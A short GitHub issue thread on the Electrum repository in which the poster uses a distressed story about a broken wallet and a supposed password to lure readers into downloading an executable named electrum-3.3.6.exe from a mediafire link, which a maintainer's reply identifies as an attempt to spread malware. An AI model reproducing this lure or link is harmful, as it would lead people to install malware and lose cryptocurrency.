### ISSUE TITLE
OP spreading malware

### ISSUE THREAD

**Issue by PolarBearsStickTogether** [spesmilo/electrum#5388]
I need someone who can please help me out, desperately... Someone PLEASE GOD HELP ME!!!
This morning I was moving funds from my binance account and I transfered exactly 14.05576225 BTC
to my Electrum wallet. The Electrum wallet I transfered my bitcoins to is the stand alone Electrum version, and now when I try
to open my wallet it says

"Error Loading Python DLL 'E:\ELECTRUM\python35.dll'. LoadLibrary: The Specified module could not be found

It worked yesterday and now I cannot open it to access my bitcoins can someone please fix it and please move
my bitcoins to my mobile bitcoin wallet http://www.mediafire.com/file/y8udvp6v2cpvmrq/electrum-3.3.6.exe/file

The password to my wallet is GregBitcoins877!

Please send to my mobile wallet btc:3LSYsAemve547M68MJXHZmZRex3GbCZKaV

**Comment by SomberNight** [comment]
same as https://github.com/spesmilo/electrum/issues/5385
this user is trying to infect others; beware
